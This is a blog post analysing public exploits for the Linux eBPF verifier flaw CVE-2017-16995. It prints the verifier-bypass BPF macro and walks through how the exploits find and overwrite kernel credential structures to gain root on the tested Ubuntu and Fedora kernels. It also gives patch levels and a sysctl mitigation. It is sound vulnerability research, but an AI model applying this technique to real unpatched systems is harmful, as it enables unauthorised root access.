Monday, July 9, 2018

eBPF and Analysis of the get-rekt-linux-hardened.c Exploit for CVE-2017-16995

CVE-2017-16995

"One of the best/worst Linux kernel vulns of all time" - @bleidl




The vulnerability allows for arbitrary read/write access to the linux kernel, bypassing SMEP/SMAP


Bruce Leidl @bleidl
June 4, 2017 https://twitter.com/bleidl/status/871527499984982016

Jann Horn @tehjh
December 4, 2017 - https://bugs.chromium.org/p/project-zero/issues/detail?id=1454&desc=3

https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f

https://lwn.net/Articles/742169/ 

December 23
https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

Vitaly Nikolenko @vnik5287 
March 15, 2018 - https://twitter.com/vnik5287/status/974277953394651137
http://cyseclabs.com/pub/upstream44.c

 

Vulnerability 

It is possible to bypass the bpf verifier (verifier.c), load bpf code, and create a read/write primitive. The root cause of this vulnerability is improper arithmetic/sign-extention in the 'check_alu_op()' function located within verifier.c. The improper arithmetic makes it possible for sign extension to occur in either of the following cases:

BPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)

BPF_ALU|BPF_MOV|BPF_K (load 32-bit immediate, zero-padded to 64-bit);

Please see https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f  for specifics. Ultimately, the was patched by correcting the arithmatic in the 'check_alu_op()' function and ensuring sign extension only occurs in the first case "BPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)" 

Exploit/POC - get-rekt-linux-hardened.c

The BPF instruction set that bypasses the verify function is:
#define BPF_DISABLE_VERIFIER()                                                       \
        BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),             /* r2 = (u32)0xFFFFFFFF   */   \
        BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),   /* if (r2 == -1) {        */   \
        BPF_MOV64_IMM(BPF_REG_0, 0),                      /*   exit(0);             */   \
        BPF_EXIT_INSN()                                   /* }                      */


The bpf instruction set is well documented.
OP parameter
  0 = Read the address for the frame pointer
  1 = Read the address for the sk_buff structure
  2 = Read a user supplied address
  3 = Write a value to a specified address

Using the sendcmd function with the parameters as
sendcmd(op, address, value to write)


Privilege escalation

BFP code is setup to obtain the the pointer to sk_buff. ( OP = 1)
With access to the sk_buff structure, it is possible to find the sock structure using an offset of 0x24

include/linux/skbuff.h

struct sk_buff {
        union {
                struct {
                        /* These two members must be first. */
                        struct sk_buff          *next;
                        struct sk_buff          *prev;

                        union {
                                ktime_t         tstamp;
                                u64             skb_mstamp;
                        };
                };
                struct rb_node  rbnode; /* used in netem & tcp stack */
        };
        struct sock             *sk;     <=========

 

With the address of the sock structure, scan down looking for sk_rcvtimeo by testing for the value 0x7fffffffffffffff .

Check the address 24 bytes above (sk_uid) to determine if contains the UID of the current user. If it does, sk_rcvtimeo has been found and the address for sk_peercred will be 8 bytes above it

struct sock {
        ...snipped...
        u16                     sk_gso_max_segs;
        unsigned long           sk_lingertime;
        struct proto            *sk_prot_creator;
        rwlock_t                sk_callback_lock;
        int                     sk_err,
                                sk_err_soft;
        u32                     sk_ack_backlog;
        u32                     sk_max_ack_backlog;
        kuid_t                  sk_uid;  
              <======= test for current UID            
        struct pid              *sk_peer_pid;
        const struct cred       *sk_peer_cred;
        long                    sk_rcvtimeo;
           <======= scan to look for 0x7fffffffffffffff
        ktime_t                 sk_stamp;
        u16                     sk_tsflags;
        u8                      sk_shutdown;

        ...snipped...
}

sk_peer_cred contains the address to the credential structure that can be overwritten to escalate privileges

 

Exploit/POC - Adapting @bleidl's exploit to include 4.4.x kernels

https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c

I have tested it on the following kernels
Ubuntu 16.04
  4.4.0-31-generic
  4.4.0-62-generic
  4.4.0-81-generic
  4.4.0-116-generic
  4.8.0-58-generic
  4.10.0.42-generic
  4.13.0-21-generic


Fedora 27
  4.13.9-300


The issue with the 4.4.x kernels in Ubuntu is the sock structure does not have the field @sk_uid, which contains the user id of the owner. 

4.4: /usr/src/linux-source-4.4.0/linux-source-4.4.0/include/net/sock.h
struct sock {
        ...snipped...
        u16                     sk_gso_max_segs;
        int                     sk_rcvlowat;
        unsigned long           sk_lingertime;
        struct sk_buff_head     sk_error_queue;
        struct proto            *sk_prot_creator;
        rwlock_t                sk_callback_lock;
        int                     sk_err,
                                sk_err_soft;
        u32                     sk_ack_backlog;
        u32                     sk_max_ack_backlog;
        __u32                   sk_priority;
#if IS_ENABLED(CONFIG_CGROUP_NET_PRIO)
        __u32                   sk_cgrp_prioidx;
#endif
        struct pid              *sk_peer_pid;
        const struct cred       *sk_peer_cred;
        long                    sk_rcvtimeo;           <======= scan to look for 0x7
fffffffffffffff
        long                    sk_sndtimeo;
        struct timer_list       sk_timer;

        ...snipped...
}

4.13 /usr/src/linux-source-4.13.0/linux-source-4.13.0/include/net/sock.h
struct sock {
        ...snipped...
        u16                     sk_gso_max_segs;
        unsigned long           sk_lingertime;
        struct proto            *sk_prot_creator;
        rwlock_t                sk_callback_lock;
        int                     sk_err,
                                sk_err_soft;
        u32                     sk_ack_backlog;
        u32                     sk_max_ack_backlog;
        kuid_t                  sk_uid;  
         <======= test for current UID (Missing in 4.4)            
        struct pid              *sk_peer_pid;
        const struct cred       *sk_peer_cred;
        long                    sk_rcvtimeo;
      <======= scan to look for 0x7fffffffffffffff
        ktime_t                 sk_stamp;
        u16                     sk_tsflags;
        u8                      sk_shutdown;

        ...snipped...
}


Because this vulnerability allows for arbitrary r/w access, we can scan through the sock structure and test addresses to see if they contain the correct cred structure.

Using the same logic, the code scans through the sock structure, looking for 0x7fffffffffffffff.
Once it finds the value, it tests the address 8 bytes above it:
1) Is it in kernel memory (address > physoffset (0xffff880000000000))
2) Evaluates the address as a cred structure and test to see if it contains the current UID.

struct sock {
        ...snipped...
        u16                     sk_gso_max_segs;
        int                     sk_rcvlowat;
        unsigned long           sk_lingertime;
        struct sk_buff_head     sk_error_queue;
        struct proto            *sk_prot_creator;
        rwlock_t                sk_callback_lock;
        int                     sk_err,
                                sk_err_soft;
        u32                     sk_ack_backlog;
        u32                     sk_max_ack_backlog;
        __u32                   sk_priority;
#if IS_ENABLED(CONFIG_CGROUP_NET_PRIO)
        __u32                   sk_cgrp_prioidx;
#endif
        struct pid              *sk_peer_pid;
        const struct cred       *sk_peer_cred;         <======= Evaluate this address
        long                    sk_rcvtimeo;           <======= scan to look for 0x7
fffffffffffffff
        long                    sk_sndtimeo;
        struct timer_list       sk_timer;

        ...snipped...
}

struct cred {
        atomic_t        usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
        atomic_t        subscribers;    /* number of processes subscribed */
        void            *put_addr;
        unsigned        magic;
#define CRED_MAGIC      0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
        kuid_t          uid;            /* real UID of the task */ <== Evaluate if this equals current UID
        kgid_t          gid;            /* real GID of the task */
        kuid_t          suid;           /* saved UID of the task */
        kgid_t          sgid;           /* saved GID of the task */
        kuid_t          euid;           /* effective UID of the task */
        kgid_t          egid;           /* effective GID of the task */
        kuid_t          fsuid;          /* UID for VFS ops */
        kgid_t          fsgid;          /* GID for VFS ops */
        unsigned        securebits;     /* SUID-less security management */
        kernel_cap_t    cap_inheritable; /* caps our children can inherit */
        kernel_cap_t    cap_permitted;  /* caps we're permitted */
        kernel_cap_t    cap_effective;  /* caps we can actually use */
        kernel_cap_t    cap_bset;       /* capability bounding set */
        kernel_cap_t    cap_ambient;    /* Ambient capability set */

 

As before sk_peer_cred contains the address to the credential structure that can be overwritten to escalate privileges

 

Exploit/POC - Upstream.c (4.4.x kernels)

Dangokyo has a good description of the vulnerability, exploit, and privilege escalation technique.

Upstream.c from @vnik5287 uses a different technique for privilege escalation.

In the 4.4 kernel, the thread_info struct is available at the top of the stack

linux-source-4.4.0_4.4.0-116.140_all.deb
/usr/src/linux-source-4.4.0/linux-source-4.4.0/arch/x86/include/asm/thread_info.h
struct thread_info {
        struct task_struct      *task;          /* main task structure */ <==========
        __u32                   flags;          /* low level flags */
        __u32                   status;         /* thread synchronous flags */
        __u32                   cpu;            /* current CPU */
        mm_segment_t            addr_limit;
        unsigned int            sig_on_uaccess_error:1;
        unsigned int            uaccess_err:1;  /* uaccess failed */
};


In later versions, the task_struct has been removed.

linux-source-4.13.0_4.13.0-21.24_all.deb
/usr/src/linux-source-4.13.0/linux-source-4.13.0/arch/x86/include/asm/thread_info.h
struct thread_info {
        unsigned long           flags;          /* low level flags */
};


Privilege Escalation

Linux kernel stacks start with a struct thread_info that look like this:

 * struct thread_info {
 *  struct task_struct *task;   // <--- pointer to current task_struct

The task structure contains lots of fields, but the one we are most
interested in are:

 * struct task_struct { 
 *   // ...
 *   const struct cred *real_cred;  <========

Struct cred contains:

 * struct cred {
 *   // ...
 *   uid_t           uid;
 *   gid_t           gid;
 *   uid_t           suid;
 *   gid_t           sgid;
 *   uid_t           euid;
 *   gid_t           egid;
 *   uid_t           fsuid;
 *   gid_t           fsgid;
 *   unsigned        securebits;
 *   kernel_cap_t    cap_inheritable;
 *   kernel_cap_t    cap_permitted;
 *   kernel_cap_t    cap_effective;

real_cred contains the address to the credential structure that can be overwritten to escalate privileges

 

Mitigations

Kernel Patch level
Ubuntu
https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html

4.4.x: Fixed 4.4.0-119.143
4.8.x: vulnerable up through 4.8.0-58-generic
4.10.x: vulnerable up through 4.10.0-42-generic
4.13.x: Fixed 4.13.0-25-generic

Redhat
https://bugzilla.redhat.com/show_bug.cgi?id=1528518
RHEL 5,6,7 not affected

Fedora: Fixed kernel-4.14.11 which pushed to stable on January 4, 2018

echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled
sysctl kernel.unprivileged_bpf_disabled=1

References/Resources

eBPF

https://www.kernel.org/doc/Documentation/networking/filter.txt
https://www.kernel.org/doc/Documentation/bpf/bpf_design_QA.txt
http://www.brendangregg.com/ebpf.html 
https://github.com/iovisor/bcc 
https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/ 
https://ferrisellis.com/posts/ebpf_past_present_future/
https://ferrisellis.com/posts/ebpf_syscall_and_maps/
https://suchakra.wordpress.com/2015/05/18/bpf-internals-i/
https://suchakra.wordpress.com/2015/08/12/bpf-internals-ii/

CVE-2017-16995

https://github.com/rapid7/metasploit-framework/blob/691d8f2c413bbda942fd49afe45d79771a5d1b10/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb
http://www.openwall.com/lists/oss-security/2017/12/21/2
https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c
https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c
http://cyseclabs.com/pub/upstream44.c
https://www.exploit-db.com/exploits/44298/
https://github.com/dangokyo/CVE_2017_16995 - nice disassembler.c to better visualize bpf code
https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor
https://www.securityfocus.com/bid/102288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16995
https://nvd.nist.gov/vuln/detail/CVE-2017-16995